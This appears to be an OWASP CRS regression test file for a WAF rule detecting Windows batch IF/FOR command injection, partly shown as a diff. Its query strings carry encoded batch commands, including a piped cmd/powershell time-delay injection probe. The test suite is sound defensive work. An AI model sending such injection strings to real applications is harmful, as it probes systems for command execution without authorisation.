"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+NOT+1%3D%3D2+++++++++++++++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-96 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25_prefix%25%3D%3DSS6+++++++++GOTO+they_matched" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-97 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%5B%251%5D%3D%3D%5B%5D+++++++++++++++ECHO+Value+Missing" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-98 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%5B%251%5D+EQU+%5B%5D++++++++++++ECHO+Value+Missing" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-99 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%282+GEQ+15%29+++++++++++++echo+%22bigger%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-100 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++red%3D%3Dred+++++++++++++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-101 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++NOT+red%3D%3D%3Dred++++++++++++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-102 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+++++Red%3D%3Dred+++++++++++++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-103 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%281%29+equ+%281%29+echo+hey" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-104 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%282+equ+2%29+echo+hey" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-105 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25VAR%25%22%3D%3D%25%25A+do+echo+true" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-106 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%22%25%7E1%22+%3D%3D+%22%25%7E2%22+%28EXIT+%2FB+0%29+ELSE+%28EXIT+%2FB+1%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-107 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%25n1%25+gtr+%25n2%25+echo+%25n1%25+is+greater+than+%25n2%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-108 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%25n1%25+lss+%25n2%25+echo+%25n1%25+is+less+than+%25n2%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-109 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%25n1%25+equ+%25n2%25+echo+%25n1%25+is+equal+to+%25n2%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-110 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25n1%25%22+gtr+%22%25n2%25%22+echo+%22%25n1%25%22+is+greater+than+%22%25n2%25%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-111 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25n1%25%22+lss+%22%25n2%25%22+echo+%22%25n1%25%22+is+less+than+%22%25n2%25%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-112 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25n1%25%22+equ+%22%25n2%25%22+echo+%22%25n1%25%22+is+equal+to+%22%25n2%25%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-113 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+defined+n1+set+%22n1%3D0%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-114 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+X%251%3D%3DX%2F%3F+GOTO+Helpscreen" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-115 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%22%251%22%3D%3D%22%2F%3F%22+..." - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-116 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%5B%251%5D%3D%3D%5B%2F%3F%5D+..." - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-117 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%22%25%7E1%22%3D%3D%22%2F%3F%22+..." - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-118 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+ERRORLEVEL+3+IF+NOT+ERRORLEVEL+4+..." - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-119 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+NOT+DEFINED+BAR+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-120 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22before%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-121 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22after%22+%40echo+ok" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-122 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%21VAR%21%22+%3D%3D+%22after%22+%40echo+ok" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-123 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+defined+BAR+set+FOO%3D1%26+echo+FOO%3A+%25FOO%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-124 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%28%251%29%3D%3D%28LTRS%29+CD+C%3A%5CWORD%5CLTRS" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-125 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%251%22%3D%3D%22%22+goto+ERROR" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-126 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%28AA%29+%3D%3D+%28AA%29+echo+same" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-127 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%5BAA%5D+%3D%3D+%5BAA%5D+echo+same" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-128 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22A+A%22+%3D%3D+%22A+A%22+echo+same" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-129 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%25_prog%3A%7E-1%25+NEQ+%5C+%28Set+_prog%3D%25_prog%25%5C%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-130 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+EXIST+%22temp.txt%22+ECHO+found" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-131 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+NOT+EXIST+%22temp.txt%22+ECHO+not+found" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-132 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22%22+%28SET+var%3Ddefault+value%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-133 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+NOT+DEFINED+var+%28SET+var%3Ddefault+value%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-134 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22Hello%2C+World%21%22+%28ECHO+found%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-135 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22%3D%3D%22hello%2C+world%21%22+%28+ECHO+found+%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-136 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+EQU+%221%22+ECHO+equality+with+1" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-137 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+NEQ+%220%22+ECHO+inequality+with+0" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-138 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+GEQ+%221%22+ECHO+greater+than+or+equal+to+1" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-139 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+LEQ+%221%22+ECHO+less+than+or+equal+to+1" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-140 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25ERRORLEVEL%25%22+NEQ+%220%22+%28ECHO+execution+failed%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-141 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%251+%3D%3D+%22%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-142 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%22%251%22+%3D%3D+%22%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-143 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%7B%251%7D+%3D%3D+%7B%7D" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-144 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%22A%251%22+%3D%3D+%22A%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-145 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+DEFINED+ARG+%28echo+%22It+is+defined%3A+%251%22%29+ELSE+%28echo+%22%25%251+is+not+defined%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-146 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if3q+hfy6e8egfxsjtewc838gsfbhwvw9qzfty3gjs86syg7y6mrpwgw4ekureakjpk6%2Flyghe9pnfekpw2yt8svzseinhs1rbkuu%2Fzq15u5wh8nj8dd+fn86qcdwzv3s9hw35e14pxgcv34dhmt1mwbxnicwudjawfqz+fphmr5vlnufdihoffpuvqwkcmom61i3lisyxg65fx+rgbnrs6e4pmbvy2xl+vwb8oct23cyypregi638dkychllvvw5kq7rolfbhk3hojxz9tthunqky9dodqbb6u8roh+firwx8kuf1dfgewcto9eljhuaoqgdk4qwxlziktaf1mw2atcmw7jvzsh1s0kngiepps54lj4wtcbfzfvbqb7y3caffhnvfrm3tbjxlywqakfqxoprh7yooguat5flg2ozx5%2Fafn7w%3D%3D" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-147 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+a%3D%3Db+foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-148 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if%2Fi+a%3D%3Db+foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-149 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+a%3D%3Db+foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-150 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+%22a%22%3D%3D%22b%22++foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-151 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+not++%22a%22%3D%3D%22b%22++foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-152 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+++exist+StorageServer.port+echo+yay" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-153 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+exist+StorageServer.port+echo+yay" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-154 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=ifq+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-155 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=iffoo+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-156 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if3+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-157 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if3q+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-158 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%22usebackq%22%20%25variable%20in%20%28%60command%60%29%20do%20command" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 10 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%7Cfor+%2Ff+%22delims%3D%22+%25i+in+%28%27cmd+%2Fc+%22powershell.exe+-InputFormat+none+write+%27FJQPVY%27.length%22%27%29+do+if+%25i%3D%3D6+%28cmd+%2Fc+%22powershell.exe+-InputFormat+none+Start-Sleep+-s+2%22%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 11 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR++++++++++++++%25a+IN+%28set%29+DO+abc" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 12 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 